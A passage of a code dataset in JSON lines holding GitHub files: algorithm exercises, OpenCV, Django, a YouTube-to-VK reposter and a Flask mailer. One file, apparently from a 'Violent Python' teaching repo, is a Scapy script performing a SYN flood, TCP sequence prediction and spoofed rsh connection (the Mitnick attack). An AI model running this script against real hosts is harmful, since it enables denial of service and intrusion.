python_file_content)\n commands_dict = {\n f_name.replace(\"_\", \" \"): f\"self.{f_name}\" for f_name in function_names\n }\n commands_string = \"self.commands = {\"\n for key, value in commands_dict.items():\n commands_string += f' \"{key.capitalize()}\": {value},'\n commands_string = commands_string[:-1]\n commands_string += \"}\"\n return commands_string\n\n async def get_csv_preview(self, filename: str):\n # Get first 2 lines of the file\n filepath = self.safe_join(base=self.WORKING_DIRECTORY, paths=filename)\n with open(filepath, \"r\") as f:\n lines = f.readlines()\n lines = lines[:2]\n return lines\n","repo_name":"Josh-XT/AGiXT","sub_path":"agixt/extensions/file_system.py","file_name":"file_system.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":2174,"dataset":"github-code","pt":"53"} +{"seq_id":"37067219537","text":"def searchMatrix(matrix, target):\n arr = list()\n for index in range(len(matrix)):\n arr.extend(matrix[index])\n\n return searchValue(arr, target)\n\n\ndef searchValue(arr, target):\n if len(arr) == 1 and target == arr[0]:\n return True\n if len(arr) == 1 and target != arr[0]:\n return False\n if len(arr) == 0:\n return False\n\n medium = int(len(arr)/2)\n if target == arr[medium]:\n return True\n else:\n # target가 arr[medium]의 값보다 작을 경우 (왼쪽의 반으로 이동)\n if target < arr[medium]:\n return searchValue(arr[:medium], target)\n else:\n return searchValue(arr[medium:], target)\n\n\nmatrix = [\n [1, 3, 5, 7],\n [10, 11, 16, 20],\n [23, 30, 34, 50]\n]\ntarget = 13\n\n\nprint(searchMatrix(matrix, target))\n","repo_name":"junh0328/prepare_algorithm","sub_path":"algo/binary_search_2.py","file_name":"binary_search_2.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20825916719","text":"import cv2 as cv\nimport numpy as np\nfrom joining_images import StackedImages\nwidthImg = 640\nheightImg = 480\nframeWidth = 640 \nframeHeight = 480\ncap = cv.VideoCapture(0)\ncap.set(3, widthImg)\ncap.set(4, heightImg)\n#brightness \ncap.set(10, 150)\n\n\ndef preProcessing(img):\n imgGray = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n imgBlur = cv.GaussianBlur(imgGray, (5, 5), 1)\n imgCanny = cv.Canny(imgBlur, 200, 200)\n kernel = np.ones((5, 5))\n imgDila = cv.dilate((imgCanny), kernel, iterations= 2)\n imgThres = cv.erode(imgDila, kernel, iterations=1)\n return imgThres\n\ndef getContours(img):\n biggest = np.array([])\n maxArea = 0\n contours,hierarchy = cv.findContours(img,cv.RETR_EXTERNAL,cv.CHAIN_APPROX_NONE)\n for cnt in contours:\n area = cv.contourArea(cnt)\n if area>1000:\n #cv.drawContours(imgContour, cnt, -1, (255, 0, 0), 3)\n peri = cv.arcLength(cnt,True)\n approx = cv.approxPolyDP(cnt,0.02*peri,True)\n if area >maxArea and len(approx) == 4:\n biggest = approx\n maxArea = area\n cv.drawContours(imgContour, biggest, -1, (255, 0, 0), 20)\n return biggest\n\n\ndef reorder(myPoints):\n myPoints = myPoints.reshape((4,2))\n myPointsNew = np.zeros((4,1,2),np.int32)\n add = myPoints.sum(1)\n #print(\"add\", add)\n myPointsNew[0] = myPoints[np.argmin(add)]\n myPointsNew[3] = myPoints[np.argmax(add)]\n diff = np.diff(myPoints,axis=1)\n myPointsNew[1]= myPoints[np.argmin(diff)]\n myPointsNew[2] = myPoints[np.argmax(diff)]\n #print(\"NewPoints\",myPointsNew)\n return myPointsNew\n\n\ndef getWarp(img, biggest):\n biggest = reorder(biggest)\n pts1 = np.float32(biggest)\n pts2 = np.float32([[0, 0], [widthImg, 0], [0, heightImg], [widthImg, heightImg]])\n matrix = cv.getPerspectiveTransform(pts1, pts2)\n imgOutput = cv.warpPerspective(img, matrix, (widthImg, heightImg))\n return imgOutput\n\n\nwhile True:\n success, img = cap.read()\n cv.resize(img,(widthImg, heightImg))\n imgContour= img.copy() \n\n imgThres = preProcessing(img)\n stack = StackedImages()\n\n biggest = getContours(imgThres)\n if biggest.size != 0:\n imgWarped = getWarp(img, biggest)\n imageArray = ([img, imgThres], [imgContour, imgWarped])\n else:\n imageArray = ([img, imgThres], [img, img])\n \n si = stack.stackImages(0.6, imageArray)\n cv.imshow(\"warped\", si)\n if(cv.waitKey(1) & 0xFF == ord('q')):\n break\n\n\n ","repo_name":"garymejia/OpenCV","sub_path":"document_scanner.py","file_name":"document_scanner.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8181093006","text":"n= int(input(\"Enter number the first number: \"))\n\ndef isPrime(num):\n \"\"\"Returns True if num is prime.\"\"\"\n if (num == 1) or (num % 2 == 0) or (num % 3 == 0) :\n return False\n if (num == 2) or (num == 3) :\n return True\n\n check_var= 5\n set_var = 2\n\n while check_var * check_var <= num:\n if num % check_var == 0:\n return False\n\n check_var += set_var\n set_var = 6 - set_var\n\n return True\n\nprint(isPrime(n))","repo_name":"GabuTheGreat/GabuTheGreat.github.io","sub_path":"challange/recursion_1.py","file_name":"recursion_1.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25085289658","text":"import django_tables2 as tables\n\nfrom apps.contest.models import ScoreSheet\nfrom apps.project.models import Project\n\n\nclass ProjectTable(tables.Table):\n budget_request_sum = tables.Column(verbose_name=\"Запрашиваемая сумма (руб.)\", orderable=False)\n created_on = tables.Column(verbose_name=\"Дата создания\")\n\n T1 = '''\n {% if record.contest.status == record.contest.ON_EXAM %}\n {{record.title}}\n {% else %}\n {{record.title}}\n {% endif %}\n '''\n title = tables.TemplateColumn(T1, verbose_name=\"Название проекта\", )\n\n class Meta:\n model = Project\n fields = ('id', 'title', 'organization__short_name',)\n attrs = {\"class\": \"table table-sm table-responsive\"}\n\n\nclass ScoreSheetTable(tables.Table):\n T1 = '''\n {{record.project.title}}\n '''\n project__title = tables.TemplateColumn(T1, verbose_name=\"Проект\", orderable=False)\n\n T_ACTION = '''\n {% if record.status == record.NEW and record.contest.status == record.contest.ON_EXAM%}\n    \n \n {% else %}\n \n {% endif %}\n '''\n action = tables.TemplateColumn(T_ACTION, verbose_name=\"\", orderable=False)\n\n score_sum = tables.Column(verbose_name=\"Рейтинг\", orderable=False)\n score_total_sum = tables.Column(verbose_name=\"Рейтинг k\", orderable=False)\n class Meta:\n model = ScoreSheet\n fields = ('contest', 'status', 'project__title', 'score_sum', 'score_total_sum', 'created_on')\n attrs = {\"class\": \"table table-sm table-responsive\"}\n","repo_name":"justbegan/grants_mun_obr","sub_path":"src/apps/expert/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32333510862","text":"r = 1\r\nnum = 0\r\nfor i in range(int(input())):\r\n a, b, c = map(int, input().split())\r\n r = r // a * b\r\n if c == 1:\r\n if num == 1:\r\n num = 0\r\n else:\r\n num = 1\r\n\r\nprint(num, r)","repo_name":"KHyeon9/Algorithm_Python","sub_path":"BOJ/Bronze/10834.py","file_name":"10834.py","file_ext":"py","file_size_in_byte":218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8227670288","text":"\"\"\"\nScript to repost youtube videos on vk.com. DRAFT. Do not take it seriously.\n\nNOTES:\nDoes not look further than 50 most recently uploaded videos (1 request limit).\nNo DB. Stores last reposted video id in file `last_id`.\nNo proper error handling/logging. \nDoes not guarantee repost to be atomic operation. \nYoutube API costs: 6 units / run (2 requests).\n\"\"\"\nfrom config import YT_API_KEY, YT_CHANNEL_ID, VK_API_KEY, VK_OWNER_ID, FILE_LAST_ID\n\nimport logging\nimport requests\nfrom itertools import takewhile\nfrom pprint import pprint as pp\n\n\nyt_api_baseurl = 'https://www.googleapis.com/youtube/v3/'\nvk_api_baseurl = 'https://api.vk.com/method/'\nlogger = logging.getLogger('yt2vk')\n\n\nclass RequestError(Exception):\n pass\n\n\ndef _yt_api_request(resource, params=None):\n if params is None:\n params = {}\n params['key'] = YT_API_KEY\n url = yt_api_baseurl + resource\n response = requests.get(url, params).json()\n if 'error' in response:\n raise RequestError(url, response)\n return response\n\ndef yt_new_videos(last_id=None):\n \"\"\"\n Returns list of videos which should be reposted.\n `last_id` is video id of last reposted video.\n \"\"\"\n response = _yt_api_request('channels', params={\n 'part': 'contentDetails',\n 'id': YT_CHANNEL_ID,\n })\n playlist_id = response['items'][0]['contentDetails']['relatedPlaylists']['uploads']\n \n response = _yt_api_request('playlistItems', params={\n 'part': 'snippet',\n 'playlistId': playlist_id,\n 'maxResults': 50,\n })\n videos = list(takewhile(\n lambda item: item['snippet']['resourceId']['videoId'] != last_id,\n response['items']))\n videos.reverse()\n return videos\n\ndef _vk_api_request(method_name, params=None):\n if params is None:\n params = {}\n params['access_token'] = VK_API_KEY\n params['v'] = '5.53'\n url = vk_api_baseurl + method_name\n response = requests.post(url, data=params)\n json_data = response.json()\n if 'error' in json_data:\n raise RequestError(url, json_data)\n return json_data['response']\n\ndef _vk_follow_upload_url(upload_url, yt_video_id):\n # Do not upload again if video is already uploaded. \n response = _vk_api_request('video.get', params={\n 'owner_id': VK_OWNER_ID,\n 'count': 200,\n })\n for item in response['items']:\n if yt_video_id in item['player']:\n logging.warn('Video \"%s\" was already uploaded. New video upload is cancelled.', yt_video_id)\n return item['id']\n\n response = requests.get(upload_url).json()\n if 'error_code' in response:\n raise RequestError(upload_url, response)\n\ndef vk_post(yt_video):\n snippet = yt_video['snippet']\n title = snippet['title']\n yt_video_id = snippet['resourceId']['videoId']\n yt_video_url = 'https://youtube.com/watch?v=' + yt_video_id\n description = snippet.get('description', '').strip()\n #message = title + '\\n' + description + '\\n' + yt_video_url\n message = title.upper()\n if description:\n message += '\\n\\n' + description\n message += '\\n\\n(дополнительный комментарий - в видео)'\n\n response = _vk_api_request('video.save', params={\n 'link': yt_video_url,\n #'wallpost': 1,\n 'group_id': VK_OWNER_ID.lstrip('-'),\n })\n old_vid = _vk_follow_upload_url(response['upload_url'], yt_video_id)\n if old_vid is not None:\n # Video has been uploaded already. Use it.\n vk_video_id = old_vid \n else:\n vk_video_id = response['video_id']\n \n attachments = 'video{}_{}'.format(response['owner_id'], vk_video_id)\n response = _vk_api_request('wall.post', params={\n 'owner_id': VK_OWNER_ID,\n 'from_group': 1,\n 'guid': yt_video_id,\n 'message': message,\n 'attachments': attachments,\n })\n\ndef _set_last_id(last_id):\n with open(FILE_LAST_ID, 'w') as f:\n f.write(last_id)\n\ndef _get_last_id():\n with open(FILE_LAST_ID, 'a+') as f:\n f.seek(0)\n last_id = f.read().rstrip()\n return last_id or None\n \ndef main():\n last_id = _get_last_id()\n\n # Temporary hotfix.\n # TODO: remove.\n videos = yt_new_videos(last_id)\n if len(videos) > 20:\n raise Exception(\"BS\")\n\n for yt_video in videos:\n yt_video_id = yt_video['snippet']['resourceId']['videoId']\n logger.info(\"Processing: last_id = %s, vid = %s, title = %s\",\n last_id, yt_video_id, yt_video['snippet']['title'])\n\n vk_post(yt_video)\n \n _set_last_id(yt_video_id)\n\nif __name__ == '__main__':\n try:\n main()\n except RequestError as e:\n logger.error(repr(e))\n raise\n \n","repo_name":"fortunto2/yt2vk","sub_path":"yt2vk.py","file_name":"yt2vk.py","file_ext":"py","file_size_in_byte":4782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19951107241","text":"import argparse\nfrom scapy.all import send, sr1\nfrom scapy.layers.inet import IP, TCP\n\n\ndef syn_flood(src, tgt):\n for sport in range(1024, 65535):\n ip_layer = IP(src=src, dst=tgt)\n tcp_layer = TCP(sport=sport, dport=513)\n pkt = ip_layer / tcp_layer\n send(pkt)\n\n\ndef cal_TSN(tgt):\n seq_num = 0\n pre_num = 0\n diff_seq = 0\n\n for x in range(1, 5):\n if pre_num:\n pre_num = seq_num\n pkt = IP(dst=tgt) / TCP()\n ans = sr1(pkt, verbose=0)\n seq_num = ans.getlayer(TCP).seq\n diff_seq = seq_num - pre_num\n print(f'[+] TCP Seq Difference: {str(diff_seq)}')\n\n return seq_num + diff_seq\n\n\ndef spoof_conn(src, tgt, ack):\n ip_layer = IP(src=src, dst=tgt)\n tcp_layer = TCP(sport=513, dport=514)\n syn_pkt = ip_layer / tcp_layer\n send(syn_pkt)\n\n ip_layer = IP(src=src, dst=tgt)\n tcp_layer = TCP(sport=513, dport=514, ack=ack)\n ack_pkt = ip_layer / tcp_layer\n send(ack_pkt)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n usage='python3 mitnick_attack.py SRC_SYN SRC_SPOOFED TARGET_ADDRESS')\n parser.add_argument('src_syn', type=str, metavar='SRC_SYN',\n help='specify the source for the SYN flood attack')\n parser.add_argument('src_spoof', type=str, metavar='SRC_SPOOFED',\n help='specify the source for the spoofed connection')\n parser.add_argument('target', type=str, metavar='TARGET_ADDRESS',\n help='specify the target address of the attack')\n args = parser.parse_args()\n\n _syn_spoof = args.src_syn\n _src_spoof = args.src_spoof\n _target = args.target\n\n print('[+] Starting SYN Flood to suppress the remote server.')\n syn_flood(_syn_spoof, _src_spoof)\n\n print('[+] Calculating correct TCP Sequence Number.')\n _seq_num = cal_TSN(_target) + 1\n\n print('[+] Spoofing Connection.')\n spoof_conn(_src_spoof, _target, _seq_num)\n\n print('[+] Done.')\n","repo_name":"EONRaider/violent-python3","sub_path":"chapter04/mitnick_attack.py","file_name":"mitnick_attack.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","stars":922,"dataset":"github-code","pt":"53"} +{"seq_id":"74197192809","text":"import smtplib\r\nimport ssl\r\nimport mimetypes\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom email.mime.image import MIMEImage\r\nfrom tkinter import *\r\nimport tkinter as tk\r\nimport six\r\nimport os.path\r\nimport tkinter.scrolledtext as scrolledtext\r\nfrom pyfiglet import figlet_format\r\nfrom email.mime.application import MIMEApplication\r\nfrom tkinter import filedialog\r\nimport flask\r\nfrom flask_cors import CORS\r\nimport json\r\nfrom flask.json import jsonify\r\nfrom flask import request\r\nfrom werkzeug.utils import secure_filename\r\ntry:\r\n from termcolor import colored\r\nexcept ImportError:\r\n colored = None\r\n\r\nlogin_details = dict()\r\nto_emails = np.zeros(3)\r\ndetails = dict()\r\n\r\n\r\nstyletagsfinal = \"\"\"\"\"\"\r\n\r\nbodytagsfinal = \"\"\"\r\n
\r\n \"Document\"\r\n\r\n
\r\n
\r\n \"Image\"\r\n \"Image\"\r\n
\r\n\r\n

Dear Manager
\r\n Greeting from Start@KMV,\r\n The Placement Cell Of Keshav Mahavidyalaya, University of Delhi

\r\n\r\n We would like to inform you about the commencement\r\n of the Placement Season for the session 2020-21.

The\r\n Students of Keshav Mahavidyalaya are a diverse group of\r\n exceptional individuals interested in a variety of\r\n opportunities. Our students have been placed in\r\n prestigious companies like AT Kearney, EY, TresVista,\r\n Deloitte, ZS, Infosys, S&P Global & Gartner among others.

\r\n\r\n We wish to set new records this season and thus invite\r\n your esteemed organization for placement and internship\r\n opportunities. In the light of the current situation, we are\r\n also open to Virtual hiring drives.
\r\n PFA : Placement Brochure

\r\n\r\n For further information, contact-
\r\n Pranjal Kukreja - 9711376316
\r\n Riya Himmatramka - 9289997915
\r\n\r\n Thank You
\r\n Regards
\r\n Start@KMV
\r\n The Placement Cell
\r\n Keshav Mahavidyalaya
\r\n University of Delhi

\r\n
\r\n
\r\n\r\n\r\n\"\"\"\r\n\r\n\r\ndef emails_to_be_sent(snum, enum, mailaddr, sheetlink, subject):\r\n global login_details\r\n try:\r\n database = pd.read_csv(sheetlink)\r\n try:\r\n snum = int(snum)\r\n enum = int(enum)\r\n database = database.iloc[snum-1:enum, ::]\r\n # starting: ending , 169, 200\r\n database[\"Name\"] = database[\"Name\"].fillna(\r\n \"Sir/Ma'am\") # \"\" --> hiring manager\r\n details = dict(zip(database[\"Email\"], database[\"Name\"]))\r\n to_emails = database[\"Email\"].values\r\n login_details = {'smtp_server': 'smtp.gmail.com', 'smtp_protocol': 'tls',\r\n 'example_no': '3', 'from_email': mailaddr, 'to_email': to_emails, 'subject': subject}\r\n\r\n except:\r\n return False\r\n except:\r\n return False\r\n return (login_details, details)\r\n\r\n\r\ndef get_html_message(from_email, to_email, subject, detailinfo, style, body):\r\n msg = MIMEMultipart('alternative')\r\n msg['Subject'] = subject\r\n msg['From'] = from_email\r\n msg['To'] = to_email\r\n # Plain-text version of content\r\n plain_text = \"\"\"\\\r\n\r\n Greetings from Start@KMV, The Placement Cell of Keshav\r\n Mahavidyalaya, University of Delhi.\r\n\r\n To continue on the path of providing novel opportunities to the\r\n students, we are organizing the second edition of the Virtual\r\n Internship Fair on February 28, 2021.\r\n\r\n Last year’s fair was an extreme success with 30+ esteemed\r\n organizations offering a plethora of opportunities across diverse fields\r\n and witnessed more than a combined 6000+ student applications.\r\n\r\n The aim of the event is to bring employers from a variety of industries\r\n — Start-ups, MNCs and Social Organisations — hiring for various\r\n roles of internship and apprenticeship positions. In the past,\r\n companies such as Sharekhan, Zomato Feeding India, Sanguine\r\n Capital, Vivo, The MoneyRoller, Grant Thornton, Deloitte, NITI Aayog,\r\n Wipro and many more have participated and selected students for\r\n internships.\r\n\r\n We wish to invite your esteemed organisation for the same and look\r\n forward to a mutually beneficial relationship with your organisation.\r\n\r\n PFA: Brochure\r\n\r\n For further information, contact -\r\n Pranjal Kukreja - 9711376316\r\n Riya Himmatramka - 9289997915\r\n\r\n Thank You\r\n Regards\r\n Start@KMV\r\n The Placement Cell\r\n Keshav Mahavidyalaya\r\n University of Delhi\r\n \"\"\"\r\n # html version of content\r\n html_content = \"\"\"\\\r\n \r\n \r\n \r\n styletags\r\n \r\n \r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n Document\r\n \r\n bodytags\r\n \r\n\r\n \"\"\"\r\n html_content = html_content.replace(\"styletags\", style, 1)\r\n html_content = html_content.replace(\"bodytags\", body, 1)\r\n html_content = html_content.replace(\"Manager\", detailinfo[to_email])\r\n text_part = MIMEText(plain_text, 'plain')\r\n html_part = MIMEText(html_content, 'html')\r\n msg.add_header('Content-Type', 'text/html')\r\n msg.attach(text_part)\r\n msg.attach(html_part)\r\n return msg\r\n\r\n\r\ndef get_attachment_message(from_email, to_email, subject, detailinfo, style, body, filename):\r\n msg = get_html_message(from_email, to_email, subject,\r\n detailinfo, style, body)\r\n \r\n file_path = filename\r\n ctype, encoding = mimetypes.guess_type(file_path)\r\n maintype, subtype = ctype.split('/', 1)\r\n pdf = MIMEApplication(open(file_path, 'rb').read())\r\n pdf.add_header('Content-Disposition', 'attachment', filename=os.path.splitext(\r\n filename)[0].split(\"/\")[-1] + os.path.splitext(filename)[1])\r\n msg.attach(pdf)\r\n return msg\r\n\r\n\r\ndef send_email(email_info, detailinfo, style, body, filename, server):\r\n example_no = email_info.get('example_no', '')\r\n from_email = email_info.get('from_email', '')\r\n to_email = email_info.get('to_email', '')\r\n subject = email_info.get('subject', '')\r\n\r\n try:\r\n if filename == '':\r\n for x in to_email:\r\n msg = get_html_message(\r\n from_email, x, subject, detailinfo, style, body)\r\n server.send_message(msg)\r\n return True\r\n \r\n else:\r\n for x in to_email:\r\n msg = get_attachment_message(\r\n from_email, x, subject, detailinfo, style, body, filename)\r\n server.send_message(msg)\r\n return True\r\n finally:\r\n server.quit()\r\n\r\n\r\ndef sendMails(email, password, subject, link, eno, sno, filename):\r\n smtp_server = 'smtp.gmail.com'\r\n protocol = 'tls'\r\n context = ssl.create_default_context()\r\n try:\r\n if protocol == 'ssl':\r\n port = 465\r\n server = smtplib.SMTP_SSL(smtp_server, port, context=context)\r\n server.login(email, password)\r\n elif protocol == 'tls':\r\n port = 587\r\n server = smtplib.SMTP(smtp_server, port)\r\n server.starttls(context=context)\r\n server.login(email, password)\r\n except Exception as e:\r\n print(e)\r\n return \"email\"\r\n x = main(sno, eno, email, password, link, subject,styletagsfinal,bodytagsfinal,filename,server )\r\n return x\r\n\r\n\r\ndef main(start, end, mailaddr, passwd, sheetlink, subject, style, body, filename, server):\r\n loginreturn = emails_to_be_sent(start, end, mailaddr, sheetlink, subject)\r\n if(loginreturn):\r\n email_info, detailinfo = loginreturn\r\n val = send_email(email_info, detailinfo, style, body, filename, server)\r\n if(val):\r\n return True\r\n else:\r\n return \"error\"\r\n else:\r\n return \"link\"\r\n\r\n\r\n\r\n\r\napp = flask.Flask(__name__)\r\nuploads_dir = os.path.join(app.instance_path, 'uploads')\r\nCORS(app)\r\n@app.route('/api', methods=['GET', 'POST'])\r\ndef email():\r\n if flask.request.method == 'POST':\r\n print(\"Received a req\")\r\n email = request.form.get('email')\r\n password = request.form.get('password')\r\n subject = request.form.get('subject')\r\n link = request.form.get('link')\r\n eno = request.form.get('eno')\r\n sno = request.form.get('sno')\r\n file = request.files['file']\r\n file.save(os.path.join(uploads_dir, secure_filename(file.filename)))\r\n x = sendMails(email, password, subject, link, eno, sno, \".//instance//uploads//\"+file.filename)\r\n if(x == \"email\"):\r\n return \"cred\"\r\n elif( x ==\"link\"):\r\n return \"link\"\r\n elif( x ==\"error\"):\r\n return \"error\"\r\n else:\r\n return \"Done\"\r\n\r\n\r\napp.run(host=\"127.0.0.1\", port=5000, debug=True)\r\n\r\n\r\n\r\n\r\n","repo_name":"manav-1/Bulk-Emailing-React-App","sub_path":"emailserver.py","file_name":"emailserver.py","file_ext":"py","file_size_in_byte":11554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7255671069","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 6 20:42:53 2023\n\n@author: anthony\n\"\"\"\nimport numpy as np\n\n# function to know if we can place a queen\ndef issafe(x,y):\n global board\n board_size = len(board)\n for i in range(board_size):\n # check if queen on column\n if board[x][i] == 1:\n return False\n # check if queen on row\n if board[i][y] == 1:\n return False\n # check if queen on top-left diagonal\n i, j = x, y\n while i >=0 and j >= 0:\n if board[i][j] == 1:\n return False\n i -= 1\n j -= 1\n # check if queen on top-right diagonal\n i, j = x, y\n while i >=0 and j < board_size:\n if board[i][j] == 1:\n return False\n i -= 1\n j += 1\n # check if queen on bottom-left diagonal\n i, j = x, y\n while i < board_size and j >= 0:\n if board[i][j] == 1:\n return False\n i += 1\n j -= 1\n # check if queen on bottom-right diagonal\n i, j = x, y\n while i < board_size and j < board_size:\n if board[i][j] == 1:\n return False\n i += 1\n j += 1 \n \n return True\n\n# find all combinations of possible solutions\ndef solve_all_solutions(x, y):\n global board, nb_solutions\n board_size = len(board)\n for i in range(x, board_size):\n for j in range(board_size):\n if issafe(i,j):\n board[i][j] = 1\n solve_all_solutions(i+1,0)\n board[i][j] = 0\n return\n nb_solutions +=1\n \n# find one solution\ndef solve(x, y):\n global board, nb_solutions\n board_size = len(board)\n for i in range(x, board_size):\n for j in range(board_size):\n if issafe(i,j):\n board[i][j] = 1\n if solve(i+1,0):\n return True\n board[i][j] = 0\n return False\n print(board)\n return True\n\n\n\n# define size of board\nn = int(input(\"Which size of board ? \"))\n\nboard = np.zeros((n,n))\n\nnb_solutions = 0\nsolve_all_solutions(0, 0)\nprint(\"There is \", nb_solutions, \" solutions\")\n \nsolve(0,0)\n","repo_name":"anthony-ait/Misc_python","sub_path":"queen_problem.py","file_name":"queen_problem.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72282254569","text":"# 장애물 3개를 설치해서 감시를 피할 수 있는 지 출력\n# 박스는 (1,1)부터 시작\n\nfrom itertools import combinations\n\nn = int(input())\n\nbox = []\nteacher = []\nnothing = []\n\ndx = [-1,1,0,0]\ndy = [0,0,-1,1]\ndef check(x,y,newBox):\n for i in range(4):\n nx = x\n ny = y\n while True:\n nx = nx+dx[i]\n ny = ny+dy[i]\n if 0<=nx int:\n # push val into\n # -4,-2 and 5,8(large)\n if self.large and val >= self.large[0]:\n res = self.large[0]\n large = heapq.heappushpop(self.large, val)\n heapq.heappush(self.nums, -large)\n return res\n heapq.heappush(self.nums, -val)\n return -self.nums[0]\n\n\n\nclass KthLargest:\n # TC:O(nlogn), SC:O(k)\n def __init__(self, k: int, nums: List[int]):\n self.k = k\n self.nums = nums\n heapq.heapify(self.nums)\n # leave k elements, top k largest\n for _ in range(len(nums) - k):\n heapq.heappop(self.nums)\n\n # TC:O(logk)\n def add(self, val: int) -> int:\n # 2,4,5,8 => 4,5,8\n heapq.heappush(self.nums, val)\n if len(self.nums) > self.k:\n heapq.heappop(self.nums)\n return self.nums[0]\n\n# Your KthLargest object will be instantiated and called as such:\n# obj = KthLargest(k, nums)\n# param_1 = obj.add(val)","repo_name":"ychanc2104/LeetCode","sub_path":"Kth Largest Element in a Stream.py","file_name":"Kth Largest Element in a Stream.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"442909883","text":"import xlrd\r\n\r\n\r\nclass InitPage:\r\n success_data = []\r\n wb = xlrd.open_workbook(filename='HKR.xlsx', encoding_override=True)\r\n st = wb.sheet_by_index(0)\r\n rows = st.nrows # 获取行数\r\n row = st.row_values(0)[:3] # 提取表格内的前三个标题\r\n for i in range(1, rows):\r\n row1 = (st.row_values(i)[:3]) # 提取表格内除标题外的所有行的前三项的值\r\n b = (dict(zip(row, row1))) # 将键和值压缩成为一个字典\r\n success_data.append(b) # 使空的列表内包含上字典\r\n\r\n error_data = []\r\n wb = xlrd.open_workbook(filename='HKR.xlsx', encoding_override=True)\r\n st = wb.sheet_by_index(1)\r\n rows = st.nrows # 获取行数\r\n row = st.row_values(0)[:3]\r\n for x in range(1, rows):\r\n row2 = (st.row_values(x)[:3])\r\n b = (dict(zip(row, row2)))\r\n error_data.append(b)\r\n","repo_name":"liguopu/-","sub_path":"day03【自动化框架】/autoweb03/InitPage.py","file_name":"InitPage.py","file_ext":"py","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15071611335","text":"from clases import *\n\n\ndef main():\n # Creo una profesión\n ing = Profesion(\"Ingeniero Civil Industrial\", 1000)\n\n # Creo un usuario\n usuario1 = Usuario(\"José Miguel Mercado Gutiérrez\", ing, 26)\n\n # Imprimo el saldo del usuario\n\n print(f\"El saldo del usuario es: ${usuario1.billetera.saldo}\")\n\n # Le agrego $1.000 pesos más\n usuario1.billetera.ingresar_dinero(1000)\n\n print(f\"El saldo del usuario es: ${usuario1.billetera.saldo}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Ontos-2021/CashFlow_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7584604334","text":"from django.db import models\n\nfrom stdimage.models import StdImageField\n\n\nclass Base(models.Model):\n criado = models.DateField('data de Criação', auto_now_add=True)\n modificado = models.DateField('data de Atualização', auto_now_add=True)\n ativo = models.BooleanField('ativo?', default=True)\n\n class Meta:\n abstract = True\n\n\nclass Vinho(Base):\n nome = models.CharField('Nome do Vinho',max_length=100)\n cor = models.CharField('Cor',max_length=20,default='Tinto', choices=(('T','Tinto'), ('R', 'Rose'), ('B', 'branco')))\n uva = models.CharField('Uva',max_length=20,default='Cabernet',\n choices=(('CS', 'Cabernet Sauvignon'),\n ('CF', 'Cabernet Franc'),\n ('PN', 'Pinot Noir'),\n ('ME', 'Merlot'),\n ('MA', 'Malbec'),\n ('RS', 'Riesling'),\n ('TN', 'Tannat'),\n ('CH', 'Chardonnay')))\n acucar = models.CharField('Teor de Açucar',max_length=20, default='Seco',\n choices=(('SC', 'Seco'),\n ('DS', 'Demi Sec'),\n ('SU', 'Suave'),\n ('DO', 'Doce'),\n ('NA', 'Nature'),\n ('EB', 'Extra Brut'),\n ('BR', 'Brut')))\n safra = models.IntegerField('Safra')\n nacionalidade = models.CharField('Nacionalidade',max_length=20, default='Brasil',\n choices=(('BR', 'Brasil'),\n ('AR', 'Argentina'),\n ('UR', 'Uruguai'),\n ('CH', 'Chile'),\n ('PO', 'Portugal'),\n ('ES', 'Espanha'),\n ('FR', 'França'),\n ('IN', 'Inglaterra'),\n ('IT', 'Itália'),\n ('AL', 'Alemanha'),\n ('SU', 'Suiça'),\n ('EU', 'Estados Unidos'),\n ('AF', 'África do Sul'),\n ('AU', 'Austrália')))\n vinicula = models.CharField('Vinícula',max_length=20)\n alcool = models.DecimalField('Teor de Álcool', max_digits=3, decimal_places=1)\n volume = models.IntegerField('Volume')\n reserva = models.CharField('Reserva',max_length=20, default='Reserva',\n choices=(('RE', 'Reserva'),\n ('NR', 'Não Reservado')))\n tonalidade = StdImageField('Tonalidade', upload_to='tonalidade', variations={'thumb': (124,124)})\n img_rotulo = StdImageField('Rótulo', upload_to='produto', variations={'thumb': (124,124)})\n img_garrafa = StdImageField('Garrafa', upload_to='garrafa', variations={'thumb': (256,256)})\n descricao = models.TextField('Descrição',blank=True, null=True)\n preco = models.DecimalField('Preço', max_digits=8, decimal_places=2)\n promocao = models.DecimalField('Promoção', max_digits=8, decimal_places=2)\n estoque = models.IntegerField('Estoque')\n avaliacao = models.IntegerField('Avaliação')\n num_avaliacoes = models.IntegerField('Número de avaliações')\n destaque = models.BooleanField('Destaque', 